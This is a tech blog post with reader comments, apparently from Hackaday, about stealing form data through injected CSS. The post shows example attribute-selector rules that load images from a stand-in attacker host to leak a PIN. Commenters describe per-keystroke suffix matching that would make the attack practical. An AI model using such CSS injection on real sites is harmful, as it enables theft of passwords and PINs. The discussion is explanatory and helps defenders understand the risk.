CSS Steals Your Web Data

Earlier this year, we posted a link to an interactive Web page. Most people seemed to like it, but we got at least one comment about how they would never be so incautious as to allow JavaScript to run on their computers. You can argue the relative merit of that statement, but it did remind us that just disabling JavaScript is no panacea when it comes to Internet security. You might wonder how you could steal data without scripting, assuming you don’t directly control the server or browser, of course. The answer is by using a cascading style sheet (CSS). [Live Overflow] explains the exploit in the video below, covering an older paper and a recent rediscovery of the technique.

The technique hinges on you getting a CSS into the web page. Maybe you’ve partially compromised the server or maybe you wrote a malicious browser extension. The method works because you can make a style conditional on an attribute of an element. That means you can ask CSS to do some special formatting on a text field with a certain value. If that formatting is to load some background image from a server you control then you can tell if the field has a particular value.

We didn’t say it was easy. Suppose you want to capture a four-digit PIN number. You will need about 10,000 lines of format. For example:

input[type="pin"][value$="0000"] { background-color: url(http://notahackaday.com/0000.png }
input[type="pin"][value$="0001"] { background-color: url(http://notahackaday.com/0001.png }
...
input[type="pin"][value$="9999"] { background-color: url(http://notahackaday.com/9999.png }

The idea is to track when a particular client loads one of the image files. Then you can assume you know which PIN number was present. This is painful and would be worse if you wanted to capture a Social Security number, a credit card number, or arbitrary text. In addition, the technique operates on attributes, but — unfortunately for us — many common frameworks make a text input’s value attribute the same as its contents for simplicity. That plays right into the attacker’s hands.

As [Live Overflow] explains, some have called this a keylogger, but that’s a bit of stretch. We think of a keylogger as something that can watch what we type anywhere. This simply probes for certain input values in a specific place. Still, it does illustrate that almost any technology can be subverted by malicious programmers.

This illustrates our own [Jack Laidlaw’s] quote: “The easiest way to secure a device is to turn it off.” Turns out these days even your dishwasher isn’t safe.

26 thoughts on “CSS Steals Your Web Data

  1. Eh, it grows just like any brute-force. You’d need a billion CSS rules to capture a social security number that’s entered in a single text field, and you probably wouldn’t want to ask people to download that and load it into RAM.

    1. Supposedly the $= is telling it you want to match on the pattern at the end of the attribute. But I can’t get it to match on the value of an input field in Chrome. If it works, you will see a new query for each letter on the server. Then you just combine those over time to figure out what they typed. You don’t need to have an entry for each and every possible combination.

    2. However, if the css is applied fast enough to request the backgrounds of intermediary results while the victim is typing, you could then use the intermediary knowledge the next time the victim visits the page in order to find out the next couple of characters

  2. Actually I don’t think 10000 rules are needed. The “value$=A” selector looks for elements ending with A. When you add a new character, a new css rule applies and a new background image is requested.

    I rogue chrome extension could act as a keylogger I could imagine…

  3. What is the point of trying to exfiltrate information like this anyway? Else than being impractical for any reasonably-sized password, if you can inject CSS in the page, you might as well just inject JS directly and read out the password, it isn’t blocked by the browser in any shape of form.

    If after that you want to send it over the net in a file name, the end result is the same, sans 10GB CSS file that makes your browser crash.

      1. No it isn’t, the value attribute is not updated by CSS alone. However JS frameworks like React will often do it, making this CSS work; indeed that’s what was happening on the Instagram login page, the first example used to demonstrate this.

        If you had JS disabled, this wouldn’t work. If you did have it enabled, it would be much easier for the attacker to use JS to get the input value.

    1. (I hope) You wouldn’t let someone else include Javascript in the ads they display on your page (sadly, a lot of ad networks do exactly that, simply include Javascript).

      But you might allow embedding of CSS: Why not? It’s only to format elements of your website, not able to exfiltrate anything….

      Much worse than ads (I hope people are cautious enough not to display ads on their login pages, but then again, login often is just a field at the top of every single page) is things like wordpress themes. These are low-quality, seldom maintained, happily loaded across the internet things that web “developers” like to rely on

      1. Things like

        that, for example, this very site includes. I’m sure wordpress’s own CSS hosting service is absolutely trustworthy and they hand-scan every single CSS for such shenanigans.

    2. A lot of websites (the majority of commercials ones these days) use externally hosted CSS, with notably Google being one who provides the oh-so-handy snippets on their servers, obviously they probably do it to see who visits where, but they could do even worse. Or any hop in-between can inject alterations if it isn’t hosted on a secure site.

      And for some reason some payment systems insist on clients using a pin code of numbers only of a limited length, like for instance 6 numbers max.

  4. Several things of note.

    The “keylogger” itself won’t work without javascript (as explained in the video). You might incidentally be a able can get form information on a page without javascript, but it has to be data pre-populated in the form. DOM node attributes are not the same as input values, and, for it to work “live”, you need some javascript framework to sync those up.

    This experiment also presumes background content for CSS is loaded *as-needed* instead of up front. I suppose browsers generally do as-needed loading of background content, but my point is more to show there’s probably some flexibility here. Unless browsers have to load things as-needed for compliance with some arbitrary RFC or something along those lines, this behavior can be easily changed.

    Furthermore, once the image content is loaded as necessary per rule invocation, that content has no need to be loaded once again. So with the javascript synching attributes, etc, maybe you could learn that a field has one “x”, but unless you have rules that could account for all the permitations of two “x”s, you won’t get the second “x”. Maybe that can be tricked by throwing some error which would force the browser to try reloading the background image again and again, but I don’t know if there is a browser that would attempt the loading of a background more than once. (To be honest it’s been a while since I messed with this stuff.)

    Finally, there’s nothing that I can see to log backspaces. You’d need an additional javascript trick for that.

    1. expiring cache can be used to trigger load on multiple occurrences. backspace is an issue, but the result can be brute forced along the possible typos. intentional backspaces are harder to catch, but still less tries are needed to retest all combinations.

  5. Hello, I remember tht I was looking something in certain website and I find out to get something I had to install two apps, on was from the Playstore and the other not the game was from untrasted page/server so I decided not to install it, what I am concern is that In the webpage I have to enter my username and OS was using (iOS or Android) so I clicked continue and after I saw many letter as if I was watching matrix I think this is what Developer/programmers call as root-code (codigo fuente) I only was able to read something like “Injecting… bla.. bla… (I don’t remember) I panic and uninstall the app from the playstore and other I did not install, then I went to clean the Ram and the memory but I am not sure if my Android has a virus or my information is under risk/compromise. I’d like to hear/read a recommendation about how to clean my device from virus/adware/malware.

    Regards,
    Yader R.

  6. the ingenuity of the thing comes it as you’re matching just on the last letter of that field. unless the victim copies+pastes his/her password, you can pick up all the characters on the server side as they are entered. a spaghetti-code as the one in the code block of the HaD post is not necessary – just a few lines for each possible letter ~90 – and it definitely will not crash your browser. it however requires the browser to fire events on each keystroke to sync the DOM value with the HTML attribute value.

  7. This is nifty, and worth taking into account when the goal is “privacy at all costs” (think dissident or whistleblower, where all that care put into TOR can just be moot for any shred of info the stupid browser gives away).

    But not to be compared with javascript (or any other “active” content — be it Flash or Google’s new&shiny Dart reborn). They are mining bitcoins[1] with javascript bugs these days, FFS!

    I think it is important to keep the Web somewhat viable without javascript et al.

    [1] Yeah, not exactly bitcoins, just some other cryptocurrency-du-jour.

Leave a Reply

Please be kind and respectful to help make the comments section excellent. (Comment Policy)

This site uses Akismet to reduce spam. Learn how your comment data is processed.